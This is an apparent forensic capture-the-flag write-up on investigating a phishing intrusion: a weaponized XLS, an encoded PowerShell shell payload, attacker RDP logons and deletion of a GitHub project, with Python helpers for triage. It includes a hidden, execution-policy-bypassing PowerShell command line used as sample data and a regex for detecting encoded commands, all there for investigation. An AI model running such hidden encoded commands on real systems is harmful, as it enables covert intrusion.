
Magnet User Summit CTF: Intrusion


So, we decided to finish our write-up today. The fourth part – the most interesting one. Intrusion! Again, no more AXIOM, only free and open source tools!

Method of Attack

What was the method of attack the threat actor used?

So, we started from Windows Event Logs analysis, and very soon found our favorite base64-encoded string in Windows PowerShell.evtx:

The event took place on 04/26/2018 16:01:39 (UTC). We decided to look for documents opened around that time, as weaponized documents are a common delivery vehicle in such attacks. Soon we found an LNK file indicating that EpochConversionExample.xls was opened on 04/26/2018 16:01:38. The document is located under C:\Users\maxpowers\Desktop\EpochConversionExample\. Let’s look inside:

Surprise! Ok, we have found a weaponized document. It’s time to find its origin. It sits inside the EpochConversionExample folder on the Desktop. Next to it you can find an archive with the same name and… a Zone.Identifier ADS:

[ZoneTransfer]

ZoneId=3

So, it was downloaded from the Internet (ZoneId=3 is the Internet zone). Where should we start? Emails or browsing history? Emails seem to be the better choice. Let’s look at mpowers@magnetic4nsics.com.ost located under C:\Users\maxpowers\AppData\Local\Microsoft\Outlook\. You can use SysTools OST Viewer to browse its contents. Let’s search for the attachment of interest. Here it is:

So, our victim got an archive with a weaponized document via email; the flag is phishing.
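The Zone.Identifier stream above is a small INI-style text; a parser for it, added here as an example and not part of the original write-up, turns the raw stream into the zone name an examiner wants to report. The sample stream is constructed: the page's stream carries only ZoneId=3, while newer Windows builds also record ReferrerUrl and HostUrl, which are included to show how they would be parsed. The read_zone_identifier helper reads the ADS from an NTFS path and only works on Windows.

```python
# Constructed sample: the page's stream has only ZoneId=3; ReferrerUrl/HostUrl and
# their values are invented here to show the fuller format newer Windows writes.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://mail.example.invalid/\r\n"
    "HostUrl=https://files.example.invalid/EpochConversionExample.zip\r\n"
)

# URL security zones as numbered by Windows (URLZONE_* values).
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}


def parse_zone_identifier(text):
    """Parse the [ZoneTransfer] section into a dict; ZoneId becomes an int plus a ZoneName."""
    result = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            result[key.strip()] = value.strip()
    if "ZoneId" in result:
        try:
            zone_id = int(result["ZoneId"])
        except ValueError:
            return result
        result["ZoneId"] = zone_id
        result["ZoneName"] = ZONE_NAMES.get(zone_id, "Unknown")
    return result


def read_zone_identifier(path):
    """Read a file's Zone.Identifier alternate data stream on NTFS (Windows only).

    Returns None when the stream is absent, i.e. the file carries no mark-of-the-web.
    """
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as f:
            return parse_zone_identifier(f.read())
    except OSError:
        return None


if __name__ == "__main__":
    info = parse_zone_identifier(SAMPLE_STREAM)
    print(f"Zone {info['ZoneId']} ({info['ZoneName']}), from {info.get('HostUrl', '?')}")
```

A missing stream is itself a finding: a downloaded file without a mark-of-the-web suggests the archive was extracted by a tool that does not propagate the stream, or that the stream was stripped.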

Attack Email Address

What was the email address associated with the attacker?

As you can see on the last screenshot, the email is thanks2u2andu@gmail.com.

Malicious Document

What is the file name of the malicious document the attacker used?

Again, we already know that it’s EpochConversionExample.xls.

Base64 Payload

What was the BASE64 payload that gave the attacker a shell? [BASE64 value]

As you have seen in the logs, the payload is:

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

Decoded Imports

What two DLLs were imported in the base64 payload? [Comma separated with extensions]

Let’s look at the same log record again:

As you can see, the flag is kernel32.dll, msvcrt.dll.
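Decoding such a record by hand works for one event, but the same steps are easy to script. The following is an added example, not code from the write-up: it pulls the base64 argument out of a logged PowerShell command line, decodes it the way PowerShell does (base64 over the UTF-16LE bytes of the script), and lists the DLLs the script references. The sample log line and the encoded script are constructed; the script is a harmless Add-Type stub that only declares two P/Invoke signatures and is not the CTF's real payload.

```python
import base64
import re

# Constructed sample: a HostApplication-style command line of the kind recorded
# in Windows PowerShell.evtx. The script is a benign Add-Type stub, NOT the
# CTF payload; it only declares two P/Invoke signatures.
STUB_SCRIPT = (
    '$sig = @"\n'
    '[DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();\n'
    '[DllImport("msvcrt.dll")] public static extern int puts(string s);\n'
    '"@\n'
    'Add-Type -MemberDefinition $sig -Name Demo -Namespace Forensics\n'
)
# PowerShell expects -EncodedCommand to be base64 of the UTF-16LE script bytes.
SAMPLE_ENCODED = base64.b64encode(STUB_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG_LINE = (
    "HostApplication=powershell.exe -NoP -NonI -W Hidden -Exec Bypass "
    "-EncodedCommand " + SAMPLE_ENCODED
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match the flag loosely and require a base64 run long enough to be a script.
ENCODED_FLAG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
DLL_NAME = re.compile(r"\b([\w\-]+\.dll)\b", re.IGNORECASE)


def decode_encoded_command(line):
    """Return the decoded script text if `line` carries an -EncodedCommand, else None."""
    m = ENCODED_FLAG.search(line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:
        return None
    return raw.decode("utf-16-le", errors="replace")


def extract_dlls(script):
    """DLL names referenced in a script, lowercased, in order of first appearance."""
    found = []
    for name in DLL_NAME.findall(script):
        name = name.lower()
        if name not in found:
            found.append(name)
    return found


def analyze_line(line):
    """Decode a logged command line and list the DLLs its script pulls in."""
    script = decode_encoded_command(line)
    if script is None:
        return None
    return {"script": script, "dlls": extract_dlls(script)}


if __name__ == "__main__":
    result = analyze_line(SAMPLE_LOG_LINE)
    print(result["script"])
    print("Imported DLLs:", ", ".join(result["dlls"]))
```

Run over every record exported from Windows PowerShell.evtx (or the 4104 script block events of Microsoft-Windows-PowerShell/Operational), this gives a quick triage list of which logged commands were encoded and what native APIs they reach for.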

First Login

What was the system time of the first login by the attacker? [UTC timestamp in the “YYYY-MM-DD hh:mm:ss” format]

To solve it, you need to analyze Windows Event Logs again, this time Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx. We already know that the host was compromised on 04/26/2018 16:01:39 (UTC), so let’s start from this date and time. We see a few RDP logons and logoffs from 71.229.178.80, but then, at 04/26/2018 18:16:29 (UTC), a logon from 47.189.34.73:

So, the flag is 2018-04-26 18:16:29.

Gemini

What was the second account the attacker logged into?

So, according to the same log file, the host was accessed via RDP with the itsupport user account too, but for some reason the flag is maxpowers.
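The two questions above (first attacker logon, second account used) come down to reading the LocalSessionManager log as a timeline. The example below is added here and is not part of the write-up: it takes a list of session events in the shape of that log (EventID 21 = session logon succeeded, 23 = logoff, 24 = disconnected, 25 = reconnection succeeded), builds a baseline of source addresses seen before the compromise time, and reports the first logon from an address outside that baseline and the accounts later used from it. The two IP addresses and the compromise time are the ones named in the write-up; the user names, session ids and all other timestamps are constructed for the example.

```python
from datetime import datetime, timezone

# Constructed sample records modelled on Microsoft-Windows-TerminalServices-
# LocalSessionManager/Operational events. Times are UTC. The IPs and the
# 18:16:29 logon come from the write-up; everything else is invented.
SAMPLE_EVENTS = [
    {"time": "2018-04-26 09:00:00", "id": 21, "user": "MAGNET\\maxpowers", "session": 1, "source": "71.229.178.80"},
    {"time": "2018-04-26 12:30:00", "id": 23, "user": "MAGNET\\maxpowers", "session": 1, "source": "71.229.178.80"},
    {"time": "2018-04-26 16:20:05", "id": 21, "user": "MAGNET\\maxpowers", "session": 2, "source": "71.229.178.80"},
    {"time": "2018-04-26 16:45:10", "id": 23, "user": "MAGNET\\maxpowers", "session": 2, "source": "71.229.178.80"},
    {"time": "2018-04-26 17:02:33", "id": 21, "user": "MAGNET\\maxpowers", "session": 3, "source": "71.229.178.80"},
    {"time": "2018-04-26 17:30:00", "id": 24, "user": "MAGNET\\maxpowers", "session": 3, "source": "71.229.178.80"},
    {"time": "2018-04-26 18:16:29", "id": 21, "user": "MAGNET\\maxpowers", "session": 4, "source": "47.189.34.73"},
    {"time": "2018-04-26 18:40:12", "id": 25, "user": "MAGNET\\itsupport", "session": 5, "source": "47.189.34.73"},
]

LOGON_IDS = {21, 25}  # 21 = session logon succeeded, 25 = reconnection succeeded
COMPROMISE_TIME = datetime(2018, 4, 26, 16, 1, 39, tzinfo=timezone.utc)


def parse_time(text):
    """Log times in this sample are 'YYYY-MM-DD hh:mm:ss' in UTC."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


def by_time(events):
    return sorted(events, key=lambda e: parse_time(e["time"]))


def baseline_sources(events, before):
    """Source addresses that logged on over RDP before the compromise time."""
    return {
        e["source"]
        for e in events
        if e["id"] in LOGON_IDS and parse_time(e["time"]) < before
    }


def first_logon_from_new_source(events, since):
    """First RDP logon at or after `since` from an address never seen logging on before it."""
    known = baseline_sources(events, since)
    for e in by_time(events):
        if e["id"] in LOGON_IDS and parse_time(e["time"]) >= since and e["source"] not in known:
            return e
    return None


def accounts_from_source(events, source):
    """Accounts used over RDP from `source`, in order of first use."""
    accounts = []
    for e in by_time(events):
        if e["id"] in LOGON_IDS and e["source"] == source and e["user"] not in accounts:
            accounts.append(e["user"])
    return accounts


if __name__ == "__main__":
    first = first_logon_from_new_source(SAMPLE_EVENTS, COMPROMISE_TIME)
    print("First logon from a new address:", first["time"], first["source"], first["user"])
    print("Accounts used from that address:", accounts_from_source(SAMPLE_EVENTS, first["source"]))
```

The baseline step is what separates the attacker's address from the owner's own remote sessions; in a real case the baseline should be built from a longer window than one morning, and the source field of EventID 21/25 should be cross-checked against Security log 4624 logon type 10 events.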

After Exfil

What was the last website the attacker went to after logging in as Max Powers for the last time?

Let’s look at browsing history, for example at the History file located under C:\Users\maxpowers\AppData\Local\Google\Chrome\User Data\Default\:

As you can see, the last record is https://github.com/mpower4nsic/ProjectE/settings/delete, and the flag is https://github.com.

What happened to project e?

What was the last thing that happened to Project E after the attacker logged into Max Powers github?

Let’s look at browsing history again – Project E was deleted.
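Chrome's History file is a SQLite database, and the detail that trips people up when reading it by hand is the timestamp format: visit times are microseconds since 1601-01-01 UTC, not Unix time. The following added example (not code from the write-up) builds a small in-memory History database with the subset of Chrome's urls and visits schema needed here, converts the timestamps, and returns the most recent visits along with the site part of the URL, which is the form the CTF answer took. The URLs are the ones the write-up names; the titles and visit times are constructed. open_history is a helper for running the same query against a copy of a real History file.

```python
import sqlite3
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit

# Chrome (WebKit) time: microseconds since 1601-01-01 00:00:00 UTC.
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def webkit_to_utc(microseconds):
    return WEBKIT_EPOCH + timedelta(microseconds=microseconds)


def utc_to_webkit(dt):
    return (dt - WEBKIT_EPOCH) // timedelta(microseconds=1)


def site_of(url):
    """Scheme and host only, e.g. https://github.com."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def last_visits(con, limit=5):
    """Most recent visits, newest first, as (url, title, UTC datetime) tuples."""
    cur = con.execute(
        "SELECT u.url, u.title, v.visit_time FROM visits v "
        "JOIN urls u ON u.id = v.url ORDER BY v.visit_time DESC LIMIT ?",
        (limit,),
    )
    return [(url, title, webkit_to_utc(t)) for url, title, t in cur.fetchall()]


def open_history(path):
    """Open a copied Chrome History file read-only; the live file is locked while Chrome runs."""
    return sqlite3.connect(f"file:{path}?mode=ro&immutable=1", uri=True)


def build_sample_history():
    """Constructed in-memory History DB with only the columns this example needs."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE urls (id INTEGER PRIMARY KEY, url TEXT, title TEXT,"
        " visit_count INTEGER, last_visit_time INTEGER);"
        "CREATE TABLE visits (id INTEGER PRIMARY KEY, url INTEGER,"
        " visit_time INTEGER, transition INTEGER);"
    )
    # URLs from the write-up; titles and times are invented for the sample.
    sample = [
        ("https://github.com/mpower4nsic/ProjectE", "ProjectE", "2018-04-26 19:02:11"),
        ("https://github.com/mpower4nsic/ProjectE/settings", "Settings", "2018-04-26 19:03:40"),
        ("https://github.com/mpower4nsic/ProjectE/settings/delete", "Delete", "2018-04-26 19:04:05"),
    ]
    for i, (url, title, ts) in enumerate(sample, start=1):
        when = utc_to_webkit(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc))
        con.execute("INSERT INTO urls VALUES (?, ?, ?, 1, ?)", (i, url, title, when))
        con.execute("INSERT INTO visits VALUES (?, ?, ?, 0)", (i, i, when))
    con.commit()
    return con


if __name__ == "__main__":
    con = build_sample_history()
    for url, title, when in last_visits(con):
        print(when.isoformat(), site_of(url), url, title)
```

Querying visits rather than urls matters: urls keeps one row per address with only the last visit time, while visits holds every visit, so the full sequence (repository page, settings, delete) is only visible there.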

That’s all! CTF is solved! Thanks for reading!

Happy forensicating!

About the authors

Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.

Igor Mikhaylov, MCFE, EnCE, ACE, OSFCE, is a digital forensic examiner with more than 20 years of experience and Mobile Forensics Cookbook author.
